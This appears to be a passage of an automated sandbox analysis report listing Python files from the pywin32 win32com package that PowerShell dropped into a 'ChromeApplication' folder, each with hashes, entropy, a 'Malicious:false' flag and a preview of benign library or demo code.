                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27995
                                                                                                                                                                                                  Entropy (8bit):4.499790024046918
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Ug3bsm2+Mv4JRa5jL8b0ND4/KzlRypOekv5w/Symo3h4V:UdmRJRa5jQTo32yqLmo3c
                                                                                                                                                                                                  MD5:AB26D2324054631E766D1CD1F2B6A3E9
                                                                                                                                                                                                  SHA1:E935A7BF217D050F1E60E386B60B69E18B7A9E0E
                                                                                                                                                                                                  SHA-256:0588F8AD9E14AB84FCB6E1182483DF44363EAD486D4E9A3AB198603FE0D9B2B7
                                                                                                                                                                                                  SHA-512:08E8CB6736FF8EF4C92FC360881CBA3E0ABF29EEE1213DAD7EC35A73C1F42600CB2559DF492354A60DABD02480AE3E7C76819BE518748F19479B804220864CA0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Manages the cache of generated Python code...Description. This file manages the cache of generated Python code. When run from the. command line, it also provides a number of options for managing that cache...Implementation. Each typelib is generated into a filename of format "{guid}x{lcid}x{major}x{minor}.py".. An external persistant dictionary maps from all known IIDs in all known type libraries. to the type library itself... Thus, whenever Python code knows the IID of an object, it can find the IID, LCID and version of. the type library which supports it. Given this information, it can find the Python module. with the support... If necessary, this support can be generated on the fly...Hacks, to do, etc. Currently just uses a pickled dictionary, but should used some sort of indexed file.. Maybe an OLE2 compound file, or a bsddb file?.""".import glob.import os.import sys.from importlib import reload..import pythoncom.import pywintypes.import win32com.import win32com.cli

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\client\genpy.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):56188
                                                                                                                                                                                                  Entropy (8bit):4.320118098845648
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:YhPCfBkATLWxO4mkAk8fliyeMQZr3aC5wnKT3:CPZATL9kAkqliyeb3adni3
                                                                                                                                                                                                  MD5:9F97DC21D09772797082D4F3C5967A53
                                                                                                                                                                                                  SHA1:770E52F9575CFC0CC8E0528781A8DDD527B77A3E
                                                                                                                                                                                                  SHA-256:06AC56208C85FDD7639A69D75E39365613AB36126B4E6456EE69CF78F38DC982
                                                                                                                                                                                                  SHA-512:42D5A3E74C8860FC17B4B81E524A0DAE9012F9134788B7AA853B3F323A53D9D65F4434C102D3DC92D3D8BA662568C2FF3177BA8327E8F27FCA7308FA4D3DACC6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""genpy.py - The worker for makepy. See makepy.py for more details..This code was moved simply to speed Python in normal circumstances. As the makepy.py.is normally run from the command line, it reparses the code each time. Now makepy.is nothing more than the command line handler and public interface...The makepy command line etc handling is also getting large enough in its own right!."""..# NOTE - now supports a "demand" mechanism - the top-level is a package, and.# each class etc can be made individually..# This should eventually become the default..# Then the old non-package technique should be removed..# There should be no b/w compat issues, and will just help clean the code..# This will be done once the new "demand" mechanism gets a good workout..import os.import sys.import time..import pythoncom.import win32com..from . import build..error = "makepy.error".makepy_version = "0.5.01" # Written to generated file...GEN_FULL = "full".GEN_DEMAND_BASE = "demand(base)".GEN_DEMAND_CHI

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\client\makepy.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):14916
                                                                                                                                                                                                  Entropy (8bit):4.427768304708846
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:GBeBZEoC2NjxKCFYKWi1bY5ydcAA6cO6chZ+7PM8HrpHCqefFRw0/gQM40da9S3:qIZEN2NjxDJ1RLA6j6qk7PMt70duo
                                                                                                                                                                                                  MD5:F7E799C6EAA5CAB3336AB136AF4E25D7
                                                                                                                                                                                                  SHA1:CC4B89EFC334E3D6CCB9FBFB6F4FED369DDCCA42
                                                                                                                                                                                                  SHA-256:BDE72A1C6118DD98094BDB8966A7C76F6019FBFBF81F068CA06AC4428D86AFF9
                                                                                                                                                                                                  SHA-512:F5301AD7048CBEB267BC33533BEDB2577923150788E5D229D67E7FD79E7C49DC65C67A728B7EA39C74E777A93BD51D5931412A1DFADBF764691C48D5B30103C2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Originally written by Curt Hagenlocher, and various bits.# and pieces by Mark Hammond (and now Greg Stein has had.# a go too :-)..# Note that the main worker code has been moved to genpy.py.# As this is normally run from the command line, it reparses the code each time..# Now this is nothing more than the command line handler and public interface...# XXX - TO DO.# XXX - Greg and Mark have some ideas for a revamp - just no.# time - if you want to help, contact us for details..# Main idea is to drop the classes exported and move to a more.# traditional data driven model..."""Generate a .py file from an OLE TypeLibrary file.... This module is concerned only with the actual writing of. a .py file. It draws on the @build@ module, which builds. the knowledge of a COM interface...""".usageHelp = """ \..Usage:.. makepy.py [-i] [-v|q] [-h] [-u] [-o output_file] [-d] [typelib, ...].. -i -- Show information for the specified typelib... -v -- Verbose output... -q

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\client\selecttlb.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6316
                                                                                                                                                                                                  Entropy (8bit):4.369023441818291
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:ABpBQDukn7UHv67dMegMbF0ewnXPN8MuAKIWbVpqBY7gPSZRZaXRM/1zwlBvaUND:AjkIHq5QNpsIWbVoY8PqwnvaUND
                                                                                                                                                                                                  MD5:8483D39CDA09E51B898036763A7D4FE2
                                                                                                                                                                                                  SHA1:993EB217EBC1D13832B69E029CAAF6257EE6DA56
                                                                                                                                                                                                  SHA-256:3C07B55189D333054A9D3C537A9DA3B8BFC68E349B4E884EE33768780D9341B7
                                                                                                                                                                                                  SHA-512:0596A519B8B27E28C2BD443D60790A20ECB34E107E0CB058A71919C46C5F8BB338F5F8167A247770E2F1BC9C69BEDB2C1FCB39A647853C364D1D53F44B8C5FD4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Utilities for selecting and enumerating the Type Libraries installed on the system."""..import pythoncom.import win32api.import win32con...class TypelibSpec:. def __init__(self, clsid, lcid, major, minor, flags=0):. self.clsid = str(clsid). self.lcid = int(lcid). # We avoid assuming 'major' or 'minor' are integers - when. # read from the registry there is some confusion about if. # they are base 10 or base 16 (they *should* be base 16, but. # how they are written is beyond our control.). self.major = major. self.minor = minor. self.dll = None. self.desc = None. self.ver_desc = None. self.flags = flags.. # For the SelectList. def __getitem__(self, item):. if item == 0:. return self.ver_desc. raise IndexError("Cant index me!").. def __lt__(self, other): # rich-cmp/py3k-friendly version. me = (. (self.ver_desc or "").lower(),. (self.desc

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\client\tlbrowse.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9524
                                                                                                                                                                                                  Entropy (8bit):4.807103058801087
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:iNLkApkQ5JTIeB/vVuvjpCmc2wyyvJlBaG3e4yj2m6D5kzyWxA+KllnWbCk1eqUy:iKQIY0r40iFuT2BUWxlW11DHrP
                                                                                                                                                                                                  MD5:14CC505029C95BF56782803508B2B055
                                                                                                                                                                                                  SHA1:2CDAA4273F079B71549BF0246824849C2A025C5F
                                                                                                                                                                                                  SHA-256:26217E6B780B392E3B13E64585BDB0C3120F75CE0C9E86FD20E55B59F6F66509
                                                                                                                                                                                                  SHA-512:9C8780DD8C4E8EFB8C6257CEB5D0FF890AA2224CE840393C1A1F24A1EF813090DC68C34252B2F2D0BE223E234C2853C77C14207A00D39FAF04F2626708F49255
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import commctrl.import pythoncom.import win32api.import win32con.import win32ui.from pywin.mfc import dialog...class TLBrowserException(Exception):. "TypeLib browser internal error"...error = TLBrowserException..FRAMEDLG_STD = win32con.WS_CAPTION | win32con.WS_SYSMENU.SS_STD = win32con.WS_CHILD | win32con.WS_VISIBLE.BS_STD = SS_STD | win32con.WS_TABSTOP.ES_STD = BS_STD | win32con.WS_BORDER.LBS_STD = (. ES_STD | win32con.LBS_NOTIFY | win32con.LBS_NOINTEGRALHEIGHT | win32con.WS_VSCROLL.).CBS_STD = ES_STD | win32con.CBS_NOINTEGRALHEIGHT | win32con.WS_VSCROLL..typekindmap = {. pythoncom.TKIND_ENUM: "Enumeration",. pythoncom.TKIND_RECORD: "Record",. pythoncom.TKIND_MODULE: "Module",. pythoncom.TKIND_INTERFACE: "Interface",. pythoncom.TKIND_DISPATCH: "Dispatch",. pythoncom.TKIND_COCLASS: "CoClass",. pythoncom.TKIND_ALIAS: "Alias",. pythoncom.TKIND_UNION: "Union",.}..TypeBrowseDialog_Parent = dialog.Dialog...class TypeBrowseDialog(TypeBrowseDialog_Parent):. "B

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\client\util.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3339
                                                                                                                                                                                                  Entropy (8bit):4.691100940722656
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:zJpegE/6zsuCxcGHTOc6bLuUcvFT7OWFDTddwy:zliLuGcGiJmrrmy
                                                                                                                                                                                                  MD5:76160F2827C8F53E210662AF76460E0A
                                                                                                                                                                                                  SHA1:BA39AF38ECA07AB6510170D33A7CBFFBD65DB51D
                                                                                                                                                                                                  SHA-256:CCFC5FAD479402B41C2299CCB3468680DEE120BFA76B0A0E0C4F34E7866AF6DC
                                                                                                                                                                                                  SHA-512:B4F4777CAF6BA19EA084833FE7824A8AC42A8CFA6BFDD4845BED030E3AC16D6CE7E3D748309A69CDA9205E3492C317077D93BB7B4AE00D10F39580E07520BA0D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""General client side utilities...This module contains utility functions, used primarily by advanced COM.programmers, or other COM modules..""".import pythoncom.from win32com.client import Dispatch, _get_good_object_..PyIDispatchType = pythoncom.TypeIIDs[pythoncom.IID_IDispatch]...def WrapEnum(ob, resultCLSID=None):. """Wrap an object in a VARIANT enumerator... All VT_DISPATCHs returned by the enumerator are converted to wrapper objects. (which may be either a class instance, or a dynamic.Dispatch type object)... """. if type(ob) != pythoncom.TypeIIDs[pythoncom.IID_IEnumVARIANT]:. ob = ob.QueryInterface(pythoncom.IID_IEnumVARIANT). return EnumVARIANT(ob, resultCLSID)...class Enumerator:. """A class that provides indexed access into an Enumerator.. By wrapping a PyIEnum* object in this class, you can perform. natural looping and indexing into the Enumerator... Looping is very efficient, but it should be noted that although random. access is suppo

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\demos\connect.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3894
                                                                                                                                                                                                  Entropy (8bit):4.8078641484480125
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:OJuvuqYsmZI8WMM1hEtQPhq6vUMMc7X7nDFZpu/kHLcv:OJuWqYsvRPhES9McJZ8MHLcv
                                                                                                                                                                                                  MD5:122A930971B0763428CDDB507BF9232B
                                                                                                                                                                                                  SHA1:B9065E8EB53905A4E383AE26AF210436C4045C34
                                                                                                                                                                                                  SHA-256:9B305A5BEE20D5D2637AEE832B2DCBA21E1EE23630F8F2C3BA43F7AA2B585EDB
                                                                                                                                                                                                  SHA-512:F4346A84C7CF9358276BBF51A5CC42A8C2767677A8E884CF3FC5A4C4DE4851AF52EC1577171681814CB1101563D6706E384764F743FAF537DA9EFC321ECDCEEB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Implements _both_ a connectable client, and a connectable server..#.# Note that we cheat just a little - the Server in this demo is not created.# via Normal COM - this means we can avoid registering the server..# However, the server _is_ accessed as a COM object - just the creation.# is cheated on - so this is still working as a fully-fledged server...import pythoncom.import win32com.server.connect.import win32com.server.util.from pywin32_testutil import str2bytes.from win32com.server.exception import Exception..# This is the IID of the Events interface both Client and Server support..IID_IConnectDemoEvents = pythoncom.MakeIID("{A4988850-49C3-11d0-AE5D-52342E000000}")..# The server which implements.# Create a connectable class, that has a single public method.# 'DoIt', which echos to a single sink 'DoneIt'...class ConnectableServer(win32com.server.connect.ConnectableServer):. _public_methods_ = [. "DoIt". ] + win32com.server.connect.ConnectableServer._public_methods_.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\demos\dump_clipboard.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2948
                                                                                                                                                                                                  Entropy (8bit):4.564498202320599
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:/LebwXuCKnbbnkPz2GXPSCzYh9dbSxSlcs9Lk0mpOqCORkT7A3R7+2tZQezY:/Lec1KbLTGXPSuYvRSxCct0mpPCjTSkP
                                                                                                                                                                                                  MD5:5BECE80B04F95E1085EE003B5E060DA6
                                                                                                                                                                                                  SHA1:8628ED3F2FA6D0035BB6F3892604F429C8D4AC1F
                                                                                                                                                                                                  SHA-256:230D40B68504B41FE6D3905735F6DC07D2A8ED8B1B766C2175DDBD3DE6D895AD
                                                                                                                                                                                                  SHA-512:60D7DF761C60572876394883DED753DF7A19B53C2C9C3E37B33F6C81992EEB2A507493D16F1ECE964F1628CB8C669662CF07262183F49A53556CAFAF4C5129E3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import pythoncom.import win32con..formats = """CF_TEXT CF_BITMAP CF_METAFILEPICT CF_SYLK CF_DIF CF_TIFF. CF_OEMTEXT CF_DIB CF_PALETTE CF_PENDATA CF_RIFF CF_WAVE. CF_UNICODETEXT CF_ENHMETAFILE CF_HDROP CF_LOCALE CF_MAX. CF_OWNERDISPLAY CF_DSPTEXT CF_DSPBITMAP CF_DSPMETAFILEPICT. CF_DSPENHMETAFILE""".split().format_name_map = {}.for f in formats:. val = getattr(win32con, f). format_name_map[val] = f..tymeds = [attr for attr in pythoncom.__dict__.keys() if attr.startswith("TYMED_")]...def DumpClipboard():. do = pythoncom.OleGetClipboard(). print("Dumping all clipboard formats..."). for fe in do.EnumFormatEtc():. fmt, td, aspect, index, tymed = fe. tymeds_this = [. getattr(pythoncom, t) for t in tymeds if tymed & getattr(pythoncom, t). ]. print("Clipboard format", format_name_map.get(fmt, str(fmt))). for t_this in tymeds_this:. # As we are enumerating there should be no need

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\demos\eventsApartmentThreaded.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3666
                                                                                                                                                                                                  Entropy (8bit):4.708146579094374
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:dlJlyKGuMR80LnqiR1qCOlMBLN/2XqDa5wt:vOluMFL1wlaLxAfit
                                                                                                                                                                                                  MD5:7B67C9B10BF9296E26C31A537CA3A7EA
                                                                                                                                                                                                  SHA1:EC4D7AEF8133DDF2C4F1A82C59351313C025519F
                                                                                                                                                                                                  SHA-256:55F3A355A7136FF55725BC0468097AA605026BACBF0CDE4A3371FA739A0C3E95
                                                                                                                                                                                                  SHA-512:DA7D29471A0AACA917AB1AD20B3E2BD834D8592907E787706658F380335C3645F2FE6C00F5B14CA1BAEAF023D3A39E3FF7E59EB28FC604F000BDB4708A175906
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# A sample originally provided by Richard Bell, and modified by Mark Hammond...# This sample demonstrates how to use COM events in an aparment-threaded.# world. In this world, COM itself ensures that all calls to and events.# from an object happen on the same thread that created the object, even.# if they originated from different threads. For this cross-thread.# marshalling to work, this main thread *must* run a "message-loop" (ie,.# a loop fetching and dispatching Windows messages). Without such message.# processing, dead-locks can occur...# See also eventsFreeThreaded.py for how to do this in a free-threaded.# world where these marshalling considerations do not exist...# NOTE: This example uses Internet Explorer, but it should not be considerd.# a "best-practices" for writing against IE events, but for working with.# events in general. For example:.# * The first OnDocumentComplete event is not a reliable indicator that the.# URL has completed loading.# * As we are demonstrating

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\demos\eventsFreeThreaded.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3464
                                                                                                                                                                                                  Entropy (8bit):4.703893146931307
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:V37jteSYpmMRpon2dFw0oLFhI4rueKpDDqABMY1qAw/2XqAsCZ5Y7XVZ+Do+GnZx:xYQMRPixhHunqiR1qn/2XqDaU6SUIt
                                                                                                                                                                                                  MD5:0A4587CA277DF0591C0FBCFA4000FBEB
                                                                                                                                                                                                  SHA1:FF8BD298F13DB23C4E468182244FDCCA4F8EA43A
                                                                                                                                                                                                  SHA-256:5A87150FAB137377757B2D09AC942CF1CEBC7112139AB35B347E9B48BCDEA8EA
                                                                                                                                                                                                  SHA-512:D330B50D95A161A0F623F53E600CD630E50462443DE152F870EDD1B6E93D51C7A86920C9F87760E993878FF782940FC1F7B7FC7E4D9085A13E878E6B18B1F585
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# A sample originally provided by Richard Bell, and modified by Mark Hammond...# This sample demonstrates how to use COM events in a free-threaded world..# In this world, there is no need to marshall calls across threads, so.# no message loops are needed at all. This means regular cross-thread.# sychronization can be used. In this sample we just wait on win32 event.# objects...# See also ieEventsApartmentThreaded.py for how to do this in an.# aparment-threaded world, where thread-marshalling complicates things...# NOTE: This example uses Internet Explorer, but it should not be considerd.# a "best-practices" for writing against IE events, but for working with.# events in general. For example:.# * The first OnDocumentComplete event is not a reliable indicator that the.# URL has completed loading.# * As we are demonstrating the most efficient way of handling events, when.# running this sample you will see an IE Windows briefly appear, but.# vanish without ever being repainted...im

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\demos\excelAddin.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6113
                                                                                                                                                                                                  Entropy (8bit):5.140198564686407
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:Ys+uSjXATySNDrYJgw3KbAq3aFaTJghDSbGa2zoyb61Fl9T+d2Rtb5YWGim4QQGo:d+uKATRDrsgw3W3uIJ0IGa2s11Fh5YOf
                                                                                                                                                                                                  MD5:C71AD79D2BE8D1C6F7F034CAE1CCF217
                                                                                                                                                                                                  SHA1:A3B9FFF9DF0E4AD4CF248AB9732A1A71AC5417EC
                                                                                                                                                                                                  SHA-256:41D219244D8F77A45B06EC8E99819FA61449EFE49E11EC472AE6EB3F2B589707
                                                                                                                                                                                                  SHA-512:1F701DD265693BCFB9D9E0E20B401D90D484C13CCF38E48258463CB0D6DF21CD2CB4C7F6E884DC3391C07E38C7EB792E4ECAFA838646EB3EA82BB925C4537272
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# A demo plugin for Microsoft Excel.#.# This addin simply adds a new button to the main Excel toolbar,.# and displays a message box when clicked. Thus, it demonstrates.# how to plug in to Excel itself, and hook Excel events..#.#.# To register the addin, simply execute:.# excelAddin.py.# This will install the COM server, and write the necessary.# AddIn key to Excel.#.# To unregister completely:.# excelAddin.py --unregister.#.# To debug, execute:.# excelAddin.py --debug.#.# Then open Pythonwin, and select "Tools->Trace Collector Debugging Tool".# Restart excel, and you should see some output generated..#.# NOTE: If the AddIn fails with an error, Excel will re-register.# the addin to not automatically load next time Excel starts. To.# correct this, simply re-register the addin (see above).#.# Author <ekoome@yahoo.com> Eric Koome.# Copyright (c) 2003 Wavecom Inc. All rights reserved.#.# Redistribution and use in source and binary forms, with or without.# modification, are permitte

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\demos\excelRTDServer.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16255
                                                                                                                                                                                                  Entropy (8bit):4.784702077372018
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:wwB/xRuKNx996Mb2kuT/0je8KGCP+RjGUxFr7NKLCVdLDZ4:F/xRuKNnBbG0jeRGCG7cL2dLN4
                                                                                                                                                                                                  MD5:F4A8D236736CCE64076DD84EEA3DC1C6
                                                                                                                                                                                                  SHA1:D329100BB5719CD86CBB25DD6FF8504E65DA0F53
                                                                                                                                                                                                  SHA-256:AB3348F8C9314A1ABB335C0811A693312DDD41C2E386DA781D54A7FA8F8FFA07
                                                                                                                                                                                                  SHA-512:976A4DC59C1CEA00289A8994BF6AEA72892F0531BEC02472BEC7B9D81D1FFA62ADC2E0D1AEF582F4DE3D9665B2BA1870C750D213B9A006B08C22FE67CA168CA0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Excel IRTDServer implementation...This module is a functional example of how to implement the IRTDServer interface.in python, using the pywin32 extensions. Further details, about this interface.and it can be found at:. http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnexcl2k2/html/odc_xlrtdfaq.asp."""..# Copyright (c) 2003-2004 by Chris Nilsson <chris@slort.org>.#.# By obtaining, using, and/or copying this software and/or its.# associated documentation, you agree that you have read, understood,.# and will comply with the following terms and conditions:.#.# Permission to use, copy, modify, and distribute this software and.# its associated documentation for any purpose and without fee is.# hereby granted, provided that the above copyright notice appears in.# all copies, and that both that copyright notice and this permission.# notice appear in supporting documentation, and that the name of.# Christopher Nilsson (the author) not be used in advertising or publicity.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\demos\iebutton.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ISO-8859 text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7085
                                                                                                                                                                                                  Entropy (8bit):4.96839296134514
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:+cq3/1skZPkAkmx9Kam3qAA/lhouvXDGR:+c6x9kAtA
                                                                                                                                                                                                  MD5:9F76D1AF1057C9B4F1FDA69DDB81CF8C
                                                                                                                                                                                                  SHA1:5CB456ADCD12C3FC013867FFB3B28BD2B67645E1
                                                                                                                                                                                                  SHA-256:C0E6B891E5C044FE0B986CBB4EA1103C865B11C88BDBE02777F98E3BF939FFD3
                                                                                                                                                                                                  SHA-512:E3CE5F716C4ADDF168E1A41A0971366796667A24C17E800233622936AF21A21ADD86005B86757D6B39C543034371B8AD4C3E94299B22324A425046A24F5DBD53
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: latin-1 -*-..# PyWin32 Internet Explorer Button.#.# written by Leonard Ritter (paniq@gmx.net).# and Robert F.rtsch (info@robert-foertsch.com)...""".This sample implements a simple IE Button COM server.with access to the IWebBrowser2 interface...To demonstrate:.* Execute this script to register the server..* Open Pythonwin's Tools -> Trace Collector Debugging Tool, so you can. see the output of 'print' statements in this demo..* Open a new IE instance. The toolbar should have a new "scissors" icon,. with tooltip text "IE Button" - this is our new button - click it..* Switch back to the Pythonwin window - you should see:. IOleCommandTarget::Exec called.. This is the button being clicked. Extending this to do something more. useful is left as an exercise...Contribtions to this sample to make it a little "friendlier" welcome!."""..# imports section..import pythoncom.import win32api.import win32com.import win32com.server.register.from win32com import universal.from win

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\demos\ietoolbar.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ISO-8859 text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11009
                                                                                                                                                                                                  Entropy (8bit):4.724867722730395
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:DclLpsSg/O7dAy1kne9TDfxTa9FMH101vCwtsLBht9OBBfvOtbp:DclLpS2v1kne9HIFO101vJGsE
                                                                                                                                                                                                  MD5:C20570F72D0898158348D2E629E4ACCD
                                                                                                                                                                                                  SHA1:844365436EB8792B04254D5AE41D68EB4C92B6ED
                                                                                                                                                                                                  SHA-256:C6E23015E8EBCEFB43B2E0CB8BBF6C0A0729ACA6294CACE1E548A5D111D0B8EF
                                                                                                                                                                                                  SHA-512:90DA2DF7EE752D0131DDCFB4DABF1E5B7708EC4FBFDA5DC301A573106EF5FB7B5AC08547BF50C6B5F2B66557E5042449F30635883760BE0FC3AA099120C10086
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: latin-1 -*-..# PyWin32 Internet Explorer Toolbar.#.# written by Leonard Ritter (paniq@gmx.net).# and Robert F.rtsch (info@robert-foertsch.com)...""".This sample implements a simple IE Toolbar COM server.supporting Windows XP styles and access to.the IWebBrowser2 interface...It also demonstrates how to hijack the parent window.to catch WM_COMMAND messages.."""..# imports section.import sys.import winreg..import pythoncom.import win32com.from win32com import universal.from win32com.axcontrol import axcontrol.from win32com.client import Dispatch, DispatchWithEvents, constants, gencache, getevents.from win32com.shell import shell.from win32com.shell.shellcon import *..try:. # try to get styles (winxp). import winxpgui as win32gui.except:. # import default module (win2k and lower). import win32gui..import array.import struct..import commctrl.import win32con.import win32ui..# ensure we know the ms internet controls typelib so we have access to IWebBrowser2 later on.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\demos\outlookAddin.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4700
                                                                                                                                                                                                  Entropy (8bit):5.013799263198753
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:Y+oVuyejXM32ghDS82a2zvVO1TfVAiiQQmoxNppa0fv27tx:EuyeM320z2a2ZO1T+QMpJfv27tx
                                                                                                                                                                                                  MD5:B82C0AB32A466625D8665B0FFA7E4F20
                                                                                                                                                                                                  SHA1:37F3A92CB66A57D3ACBF5C12C59D4F2E4C601E46
                                                                                                                                                                                                  SHA-256:FE60E008E7F39E35FB7B8680DAA21980013CCA574B2A072AFA5C7BD293ECF5C9
                                                                                                                                                                                                  SHA-512:D054905F6460B56020B3DAF6CACE0FB3413AB3A426417D88FC6FA4B5A0DFDB414C9150BB51C9054E5A7B8A8EE5BF01DFC12199C11F37E85BE0CC5EF3C5547389
                                                                                                                                                                                                  Malicious:false
